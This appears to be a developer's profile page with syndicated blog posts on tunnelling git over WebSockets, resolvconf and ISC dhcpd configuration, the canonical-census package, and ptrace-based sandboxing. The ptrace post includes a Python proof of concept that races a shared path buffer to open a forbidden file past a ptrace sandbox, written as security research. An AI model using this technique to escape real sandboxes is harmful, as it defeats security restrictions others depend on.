StephanPeijnik is currently certified at Journeyer level.

Name: Stephan Peijnik
Member since: 2006-08-25 13:03:42
Last Login: 2010-08-25 12:30:48


Homepage: http://www.sp.or.at/

Notes:

Studies:
CS student at Graz University of Technology, Austria.

Work:
Part-time developer for a nameless Internet company, working with, but sadly not on, Free Software.

Free Software relationship:
Has been using Free Software since the beginning of 2000 and has become more active in the community in 2005/2006.
Learned programming by modifying Free Software projects to see what his changes would do.

Personal bits:
Has made developing software one of his hobbies.
Is fluent in German, English, C and Python.

Projects

Recent blog entries by StephanPeijnik

Syndication: RSS 2.0
5 Jun 2012 (updated 5 Jun 2012 at 09:13 UTC)

git smart protocol via WebSockets - proof of concept

Yesterday an idea came to mind: let's try running git's smart transport protocol via a WebSocket. In a few hours of work I came up with a working solution.

But why would one want to do that? Basically, the only options you have right now for running git's smart protocol are either using git's own protocol or tunneling it via ssh. The first option leaves you without any means of authentication - so it's only usable for read-only access to public repositories. The second option involves running an ssh server, which then allows read-write access and authentication, but is quite some work to set up.
As I am working on a university assignment involving WebSockets right now, it occurred to me that there is no reason not to use WebSockets for this.

The main idea is providing a tunnel, just like the ssh transport does, but this time via a WebSocket. The logic is the same, and no modification to git itself is required.
For now I have only implemented a proof of concept which allows you to update your repository from a remote system, but the approach should work perfectly well for pushing your changes to a remote repository too.

Let's have a look at how this works.
On the local system git-fetch-pack is invoked, which talks to a git-upload-pack process on the remote end. The code I wrote provides a script which acts like an ssh client, but creates a WebSocket connection to the remote end, using Python and the websocket-client Python package. On the other side of the tunnel a simple Python WSGI application, which uses gevent-websocket, provides the server-side implementation.
Now when a WebSocket connection is established, the server spawns a git-upload-pack process and redirects its stdout to the WebSocket. Data received over the WebSocket is sent to git-upload-pack's stdin file descriptor.
On the client this logic is reversed: git-fetch-pack's stdout is redirected to the WebSocket, and data received over the WebSocket is fed to git-fetch-pack's stdin.
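
To make this more concrete, here is a rough sketch of the client-side tunnel. This is a simplified illustration rather than the actual gitws code; all names are illustrative, and how the script gets wired into git (e.g. via the GIT_SSH environment variable) is left out:

#!/usr/bin/env python
# Illustrative sketch only; the real code lives in the gitws repository.
# Requires the websocket-client package: pip install websocket-client
import os
import sys
import threading

import websocket


def ws_to_stdout(ws):
    # Everything received over the WebSocket is written to our stdout,
    # where git-fetch-pack picks it up.
    while True:
        data = ws.recv()
        if not data:
            break
        os.write(1, data)


def main(url):
    ws = websocket.create_connection(url)
    t = threading.Thread(target=ws_to_stdout, args=(ws,))
    t.daemon = True
    t.start()

    # Everything git-fetch-pack writes to our stdin is forwarded over
    # the WebSocket to the remote git-upload-pack.
    while True:
        data = os.read(0, 4096)
        if not data:
            break
        ws.send_binary(data)
    ws.close()


if __name__ == '__main__':
    main(sys.argv[1])  # e.g. ws://git.example.org/repo.git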

That's about it. Keep in mind this is a proof-of-concept, so there may be rough edges here and there and both stability and performance may be "sub-optimal".
I'd also like to point out that using WebSockets and HTTP as the underlying transport protocol gives one the opportunity to use standard HTTP(S) authentication mechanisms. This means that the WebSocket approach could be useful to git hosting sites, basically removing the need for running an ssh server.

You can find the Python code over at https://github.com/speijnik/gitws. Have fun giving it a try.

Syndicated 2012-06-05 06:08:00 (Updated 2012-06-05 09:13:30) from Stephan Peijnik

ptrace-based security just does not work

In 2009 I wrote about building a ptrace-based sandboxing system named "ujail", including a basic proof of concept.

I have been thinking about this idea for a long time now, but sadly did not have the time to implement it - until now.
Right now I am working on this idea again and whilst doing some research I came across a thread on the linux-kernel mailing list.
What initially got me there was a problem with 64-bit binaries trapping into the 32-bit syscall handling code via int 0x80. While this is awkward and keeps one from implementing a sandbox in userspace (due to not being able to access TS_COMPAT, as described in the thread), it led me to something else - a more severe problem.
Unfortunately I cannot remember who wrote it and am unable to recover the actual mail (if someone finds it, I would be happy to be notified), but someone mentioned race conditions when using ptrace as a security measure.

In short, I came up with a proof of concept which circumvents the restrictions imposed by a ptrace-based security mechanism. For those in a hurry: you can find the code of the proof of concept at github.
In the following parts of this article I would like to elaborate on the problem and how the proof of concept code exploits it.

The problem here is the fact that PTRACE_SYSCALL traps before the kernel actually fetches information from userspace.
Let me illustrate that with sys_open. Assume we are running a tracer which uses ptrace to get a SIGTRAP each time a tracee invokes a syscall, and we want to impose limits on sys_open calls.

After a syscall has been invoked it would roughly work like this:

The tracer is notified, reads the tracee's registers using PTRACE_GETREGS and reads the first syscall argument's value (namely the path argument) from the tracee's memory. It then evaluates the value and decides whether to allow the syscall or not.
Now this is exactly the way ujail would have worked in its initial design. However, using this method there is a not-so-small attack vector involving every value read from the tracee's memory.

You may now ask yourself what I am writing about, but it will make sense in a few moments, I promise.

There is a timespan between the tracer reading the path value from the tracee's memory and the tracer actually resuming the tracee using PTRACE_SYSCALL. This window allows a potentially malicious thread inside the tracee to change the value of the memory path points to and thus circumvent any restriction imposed by the tracer. Changing the value is as simple as writing to the process memory, which is shared between threads, at just the right moment and to just the right position.
As a write to memory does not generate a trap the tracer could act upon, the tracer is unaware of the modification and simply resumes the tracee's execution - jail broken.

What is important here is just the right timing. The write has to happen after the tracer has read from the tracee's memory and before it resumes execution of the tracee. However, the tracer is most likely to employ some kind of decision-finding process here. This process will take time. It may actually involve some syscalls (think mutexes, semaphores and condition variables here). All in all enough time to swap values.
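
To illustrate the idea, here is a rough Python sketch of a malicious tracee. This is a simplified illustration rather than the actual proof-of-concept code mentioned above; all paths are invented, and /etc/passwd merely stands in for a path the sandbox policy would forbid (while still being readable, so the open itself can succeed):

# Illustrative sketch only, not the original PoC. ctypes releases the
# GIL around the libc call, so the flipper thread really does run
# concurrently with open(2).
import ctypes
import os
import threading

libc = ctypes.CDLL('libc.so.6', use_errno=True)

# Path buffer shared between both threads; this is the memory the
# tracer would inspect (e.g. via PTRACE_PEEKDATA) on syscall entry.
path = ctypes.create_string_buffer(b'/tmp/harmless')


def flipper():
    # Busy-loop swapping the buffer between an allowed and a forbidden
    # path. Eventually one swap lands in the window between the
    # tracer's read of the argument and its PTRACE_SYSCALL resume.
    while True:
        path.value = b'/etc/passwd'
        path.value = b'/tmp/harmless'


t = threading.Thread(target=flipper)
t.daemon = True
t.start()

for _ in range(1000000):
    fd = libc.open(path, os.O_RDONLY)
    if fd < 0:
        continue
    # Which file did we actually get? If the tracer only ever saw
    # '/tmp/harmless' but we hold a descriptor to '/etc/passwd',
    # the jail has been broken.
    target = os.readlink('/proc/self/fd/%d' % fd)
    os.close(fd)
    if target == '/etc/passwd':
        print('restriction bypassed: opened %s' % target)
        break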

You may now think to yourself that it might be really hard to actually pull this off, and under normal circumstances it probably is. However, the mere possibility should rule out ptrace as a security measure completely.

The only way I believe this could be handled is triggering a hook inside the system call handlers themselves, just after all information has been fetched from userspace. These values are guaranteed not to be modifiable from within userspace, and thus only they should be considered when making decisions. As a consequence, ujail (and every similar security measure out there) will have to be realized at least partly in kernel space.

Feel free to leave comments, send me an email and/or point out any issues with the proof of concept code or my idea.

Syndicated 2012-02-24 15:48:00 from Stephan Peijnik

How to force a local DNS resolver to be used using resolvconf

I know it has been a while, but after reading a blog post by Anand Kumria over at planet.debian.org I decided to have a quick look at one of the problems he described.

Basically, Anand wants to force the local resolver to be used for each and every network connection, whether that connection is established manually or via NetworkManager. He wrote that fixing this configuration for every new connection manually is tedious, and I fully agree. So here is a solution which does all of this automatically, using resolvconf:

After installing the resolvconf package, resolvconf takes care of every update to /etc/resolv.conf. Using the files in /etc/resolvconf this process can be controlled and the resulting file modified to fit one's own needs.

So first of all we would like the local resolver to be used for every connection. This works by simply adding a "nameserver 127.0.0.1" directive to the /etc/resolvconf/resolv.conf.d/head file. Simple as that. Every time /etc/resolv.conf gets generated, the contents of the head file are used as its header.
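
On a stock Debian system the head file already ships with a warning comment which intentionally ends up at the top of every generated file; after the edit the head file would look roughly like this:

# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 127.0.0.1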

Using this method the local resolver is used for every connection. But Anand wanted to use only the local resolver and discard any resolvers possibly obtained via DHCP for example. Guess what, this is also possible using resolvconf.

Adding TRUNCATE_NAMESERVER_LIST_AFTER_127="yes" to /etc/default/resolvconf does exactly that. Now every nameserver directive after the 127.0.0.1 one is ignored and will not make it into /etc/resolv.conf. You can of course add more nameservers to the head file above the 127.0.0.1 directive.

Problem fixed I guess.
Don't forget to re-connect to the network or manually force re-generation of /etc/resolv.conf (e.g. by running resolvconf -u) so the changes you made get picked up. I really hope this is of use to some of you facing similar problems.

Syndicated 2011-06-01 19:53:00 (Updated 2011-06-01 19:53:24) from sp

ISC dhcpd and IP assignments from a pool to specific hosts only

Assigning an IP address statically to a host with a given MAC address using ISC dhcpd is quite trivial: one host entry, a hardware ethernet entry and a fixed-address entry, and you are up and running.
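
For reference, that trivial static case looks roughly like this (host name and addresses invented for illustration):

host examplehost {
    hardware ethernet 11:22:33:44:55:66;
    fixed-address 10.0.0.5;
}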
But what if you want to assign IP addresses from a pool to only a few hosts with specific MAC addresses?

Before you ask yourself why someone might want to do that, have a look at my (very real) use-case.
I am currently working on setting up an installation server for my employer, ANEXIA Internetdienstleistungs GmbH. The server itself uses PXE, TFTP and FAI for installing systems. To be able to do PXE booting one has to set up a DHCP server to provide configuration details, like the TFTP server address and the boot filename.

Now what one should consider is that this system is designed to provide automatic installations for internet-facing hosts, namely ones in public IP networks. Running a DHCP server in such a network is not a good idea. We neither want to dish out configurations to each and every host that asks for them, nor do we want to do a PXE boot each and every time one of our systems is restarted. The combination of FAI and pxelinux allows for default configurations which force local booting, but this still increases the (re-)boot time for those systems and potentially also the load on the TFTP server. Also, let's not even consider thinking about whether this setup is "clean" or not. I personally believe that dishing out IP addresses in a public IP network is a bad thing(tm) and I guess a lot of people will be nodding when reading these lines.

What I was asking myself is how to get something like that set up in a cleaner way, and guess what, I found a solution.
The basic idea behind this is to provide IP configuration via DHCP only to a specific set of hosts (with a specific set of MAC addresses) and to provide no information to all other hosts. The specific set of hosts are those we want to run an install on. This is a no-brainer and I guess the right way to do it, but implementing this approach is not as straight-forward as I initially thought.

Actually, implementing that idea caused me a bit of a headache and cost me a few work-hours to get right; that's why I'd like to share the configuration details with you.



Let's have a look at how to build such a setup using ISC dhcpd. We use the fact that ISC dhcpd allows you to configure not only subnets, but also pools inside subnets, which can have allow and deny rules. Such rules can take the form of "allow members of" or "deny members of" a class, where classes (and subclasses, keep on reading for details) can be defined inside the configuration file as well.

What we did first was create a subnet with a pool declaration, as follows:

subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.254;
    option broadcast-address 10.0.0.255;
    filename "fai/pxelinux.0";
    next-server 10.0.0.254;
    server-name "10.0.0.254";
    pool {
        allow members of "install";
        range 10.0.0.10 10.0.0.230;
    }
}

This configures the subnet 10.0.0.0/24, with 10.0.0.254 being the network gateway, 10.0.0.254 being the TFTP server and "fai/pxelinux.0" being the TFTP filename. Additionally, the pool declaration allows us to define a range of IP addresses we want to use, along with a line stating that only members of the "install" class should get a network configuration. If you do not have any other subnet defined in your config and a client that is not in this "install" class asks for an IP address, you will see something like this in your syslog: "dhcpd: DHCPDISCOVER from 11:22:33:44:55:66 via eth1: network 10.0.0/24: no free leases". dhcpd will not even answer these requests, so the client will not know that there is a DHCP server running here. Exactly what we wanted.

I wrote about this giving me a headache, but so far things have been pretty straight-forward. Getting this far did not take very long, believe me.

Next, we defined the "install" class as follows:

class "install" { match hardware; }
Again, not very hard to do. This tells dhcpd to look for subclasses of "install" with a matching hardware address. So let's have a look at the subclass for, let's say, the host with MAC address "11:22:33:44:55:66":

subclass "install" 1:11:22:33:44:55:66;
Note the leading "1:" there. It means nothing more or less than "ethernet". Without that leading "1:" you won't get anywhere. Matching will fail, simple as that. It took me a while to find information about this in "man 5 dhcp-eval". Quoting parts of the interesting section:

The hardware operator returns a data string whose first element is the type of network interface indicated in the packet being considered, and whose subsequent elements are the client's link-layer address. [...] Hardware types include ethernet (1), token-ring (6), and fddi (8).

Now, with the combination of the subnet, pool, class and subclass directives we could get the setup we wanted: a DHCP server only providing IP configuration to a specific set of hosts and ignoring all other DHCP requests.
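
As a recap, the relevant pieces of dhcpd.conf are the following (MAC addresses invented; one subclass line per host that should be installable):

# subnet 10.0.0.0/24 with the members-of-"install"-only pool as shown above
class "install" { match hardware; }
subclass "install" 1:11:22:33:44:55:66;
subclass "install" 1:aa:bb:cc:dd:ee:ff;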

If you have any comments about this setup or ideas on how to get something similar set up using another approach, feel free to leave a comment.

Personal final note: accidentally typing 80 instead of 08 in a MAC address will cost you an additional two hours and will even have you re-compile ISC dhcpd with eval debugging turned on, believe me. :-)

Syndicated 2011-01-01 22:01:00 (Updated 2011-01-01 22:02:38) from sp

What's all the fuss about canonical-census?

I know I have not updated this blog in quite a long time now, but something caught my attention today: canonical-census.

As slashdot.org reports, Canonical has begun tracking their (OEM) installations. Now it's obvious that people are uncomfortable with a program running on their system which phones home to their OS vendor; that's why I had a quick look at what exactly canonical-census does.

Firstly, however, I would like to point out that the report on slashdot.org is very clear about which information is being gathered, being "the number of times this system previously sent to Canonical [...], the Ubuntu distributor channel, the product name as acquired by the system's DMI information, and which Ubuntu release is being used". And it is perfectly correct. After getting the canonical-census Debian source package (using dget -u https://launchpad.net/ubuntu/+archive/partner/+files/canonical-census_0.1.dsc) one finds that, besides the Debian packaging information, it contains two scripts:

  • census (written in Python) and
  • send-census (a GNU bash script).
Now what do those scripts actually do?

send-census is installed in /etc/cron.daily, which means it will be executed once a day by the system's cron daemon. It's a mere 48 lines long, and its code is quite simple. So everyone with at least some shell scripting experience can easily check what it's doing. Now guess what, it sends exactly the information as reported on slashdot to Canonical. Nothing more and nothing less.

Technically, it keeps a plain text file containing a single number as its call-counter, residing in /var/lib/send-install-count/counter, and reads the distribution channel from /var/lib/ubuntu_dist_channel - a file which does not exist on my Ubuntu Lucid system.
The above mentioned "system's DMI information" is not the whole set of DMI information available, but only the contents of /sys/class/dmi/id/product_name, which strangely enough reads "System Product Name" on my machine. Last but not least it uses lsb-release to get the distribution release (i.e. 10.04 for my system).

Now those four pieces of information are sent to http://census.canonical.com/submit via a simple HTTP GET query, using wget. The full URL with all the parameters added is:
http://census.canonical.com/submit?count=<count>&dcd=<dist_channel>&product=<dmi_product_name>&release=<ubuntu_release_version>
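
Paraphrased - this is my shorthand, not a verbatim quote of send-census - the operative part of the script boils down to something like:

wget -q -O /dev/null "http://census.canonical.com/submit?count=${count}&dcd=${dcd}&product=${product}&release=${release}"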

The second script, census, is the part that runs on Canonical's side. Basically census reads their Apache access log file and builds an SQLite database from its contents. At 391 lines this script is a bit longer, but it does not end up in the Debian package at all.

Personally I do not see how Canonical or one of their partners could possibly do anything harmful with that information. Comparing this to Debian's popcon reveals that Debian is gathering a lot more information.

Now there are two more things one should consider: census is targeted at OEMs, which means it's unlikely to end up on each and every Ubuntu installation, and it can be uninstalled by removing the canonical-census package with your favorite package manager.

Finally, think about this for a second: It's a shell script you can always examine. There is no hidden magic and it's a plain HTTP request the script is sending. No evil things happening there.
And now compare that to what other (often proprietary) software vendors do and how much data they submit, possibly even in encrypted form so you do not know for sure what is being sent to them.

Personally, I welcome Canonical's openness in providing their users with the package's code this early and being straight about what information it submits. They could have silently added it to those installations, after all...

Happy hacking!

Syndicated 2010-08-10 12:07:00 (Updated 2010-08-10 12:07:35) from sp


 

StephanPeijnik certified others as follows:

  • StephanPeijnik certified StephanPeijnik as Journeyer
  • StephanPeijnik certified rms as Master
  • StephanPeijnik certified jemarch as Journeyer
  • StephanPeijnik certified werner as Master
  • StephanPeijnik certified jonas as Master
  • StephanPeijnik certified greve as Master
  • StephanPeijnik certified brett as Journeyer
  • StephanPeijnik certified mattl as Journeyer
  • StephanPeijnik certified karlberry as Master

Others have certified StephanPeijnik as follows:

  • StephanPeijnik certified StephanPeijnik as Journeyer
  • jemarch certified StephanPeijnik as Journeyer
  • mattl certified StephanPeijnik as Journeyer


